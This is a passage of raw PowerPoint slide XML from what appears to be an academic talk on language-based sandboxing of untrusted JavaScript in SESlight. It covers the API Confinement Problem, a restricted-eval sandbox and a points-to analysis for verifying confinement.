              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> Allows an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>upper bound </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>on side-effects of executing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C0504D"/>
              </a:solidFill>
              <a:latin typeface="Times"/>
              <a:cs typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p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590800" y="1106269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Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0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3600" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>,…,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" err="1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3600" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>n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the Sandbox Problem for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" err="1" smtClean="0"/>
              <a:t>light</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="-25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11430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Developed a small-style Operational Semantics for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>SES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" baseline="-25000" dirty="0" err="1" smtClean="0"/>
              <a:t>light</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> 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54057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Much </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>simpler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> than JSLint, FBJS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Caja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 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457200" y="4038600"/>
            <a:ext cx="8382000" cy="1295400"/>
            <a:chOff x="457200" y="4037830"/>
            <a:chExt cx="8382000" cy="1295400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Manual Operation 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="4781550" y="3752080"/>
              <a:ext cx="1104900" cy="1676400"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartManualOperation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urier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8200" y="4244515"/>
              <a:ext cx="16430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SES</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" baseline="-25000" dirty="0" err="1" smtClean="0"/>
                <a:t>light</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t> Filter &amp; Rewriter</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Right Arrow 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6400801" y="4380730"/>
              <a:ext cx="910303" cy="362712"/>
            </a:xfrm>
            <a:prstGeom prst="right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96200" y="4368943"/>
              <a:ext cx="914400" cy="430887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i="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>s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57200" y="4342630"/>
              <a:ext cx="2439219" cy="990600"/>
              <a:chOff x="436716" y="3657600"/>
              <a:chExt cx="2439219" cy="9906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57200" y="3657600"/>
                <a:ext cx="2418735" cy="498928"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="12700"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  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier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36716" y="3663315"/>
                <a:ext cx="2418735" cy="984885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1" algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent3"/>
                    </a:solidFill>
                    <a:latin typeface="Courier"/>
                    <a:cs typeface="Courier"/>
                  </a:rPr>
                  <a:t>eval(</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                    <a:latin typeface="Times"/>
                    <a:cs typeface="Times"/>
                  </a:rPr>
                  <a:t>s</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent3"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>,</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent3"/>
                    </a:solidFill>
                    <a:latin typeface="Courier"/>
                    <a:cs typeface="Courier"/>
                  </a:rPr>
                  <a:t>”api</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent3"/>
                    </a:solidFill>
                    <a:latin typeface="Courier"/>
                    <a:cs typeface="Courier"/>
                  </a:rPr>
                  <a:t>”)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
              </a:p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15" name="Right Arrow 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="3200401" y="4402645"/>
              <a:ext cx="910303" cy="362712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43800" y="4735298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Untrusted</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/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228600" y="1752600"/>
            <a:ext cx="8458200" cy="5207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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Theorem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>α</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-renaming of bound variables is semantics preserving</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.   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228600" y="2438400"/>
            <a:ext cx="8610600" cy="25146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A simple sandbox:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Store API in variable “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Restrict untrusted code so that “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>” is its only free variable </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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8600" y="3898880"/>
            <a:ext cx="8610600" cy="9017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The API Confinement Problem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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verify that no sandboxed untrusted program can use the API to obtain a reference to a critical resource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1447800"/>
            <a:ext cx="9144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language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Sandboxing technique for untrusted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 for verifying confinement of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APIs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Applications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Setting up the API Confinement Problem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1150203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API Confinement Problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Given  trusted code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and a set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>critical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> of critical references, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>verify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Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Confine(t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, critical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2438400"/>
            <a:ext cx="8915400" cy="584776"/>
            <a:chOff x="228600" y="1929824"/>
            <a:chExt cx="8915400" cy="584776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1929824"/>
              <a:ext cx="49530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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>t</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> ;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                </a:rPr>
                <a:t>eval(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman Bold Italic"/>
                  <a:cs typeface="Times New Roman Bold Italic"/>
                </a:rPr>
                <a:t>s</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                </a:rPr>
                <a:t>,“api”,”test</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                </a:rPr>
                <a:t>”</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Curved Connector 17"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="600000" flipV="1">
              <a:off x="5325092" y="2126016"/>
              <a:ext cx="1824766" cy="308695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accent3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467600" y="1969927"/>
              <a:ext cx="1676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accent3"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>end</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rounded Rectangular Callout 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="3429000"/>
            <a:ext cx="2133600" cy="889144"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -16031"/>
              <a:gd name="adj2" fmla="val -10262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200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Trusted API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="22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2286000" y="3429432"/>
            <a:ext cx="2209800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44972"/>
              <a:gd name="adj2" fmla="val -14953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alibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Untrusted code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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5143500" y="3302720"/>
            <a:ext cx="3429000" cy="1015856"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -65950"/>
              <a:gd name="adj2" fmla="val -8458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solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>: untrusted code must set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>”test”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> to a critical reference to win</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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76200" y="3835256"/>
            <a:ext cx="8839200" cy="965344"/>
            <a:chOff x="152400" y="3352800"/>
            <a:chExt cx="8839200" cy="965344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rounded Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="152400" y="3352800"/>
              <a:ext cx="8839200" cy="96534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mpd="sng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Confine(t</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>, critical)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>For all untrusted terms </a:t>
              </a:r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s</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> in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SES</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>light</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
            </a:p>
            <a:p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</a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31" name="Picture 30" descr="latex-image-1.pdf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3"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
            </mc:Choice>
            <mc:Fallback>
              <p:blipFill>
                <a:blip r:embed="rId4"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
            </mc:Fallback>
          </mc:AlternateContent>
          <p:spPr>
            <a:xfrm>
              <a:off x="292100" y="3886200"/>
              <a:ext cx="7937500" cy="3175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 animBg="1"/>
      <p:bldP spid="28" grpId="1" animBg="1"/>
      <p:bldP spid="23" grpId="1" animBg="1"/>
      <p:bldP spid="23" grpId="2" animBg="1"/>
      <p:bldP spid="23" grpId="3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&amp;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3450"/>
            <a:ext cx="8686800" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="-182880">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0"/>
              <a:t>Hurdles:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>Forall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> quantification on untrusted code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Analysis of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>,…,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> general</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean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8600" y="3733800"/>
            <a:ext cx="87503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Techniques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-274320">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flow-Insensitive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0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Context-Insensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> Points-to analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-274320">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Abstract </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>,…,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
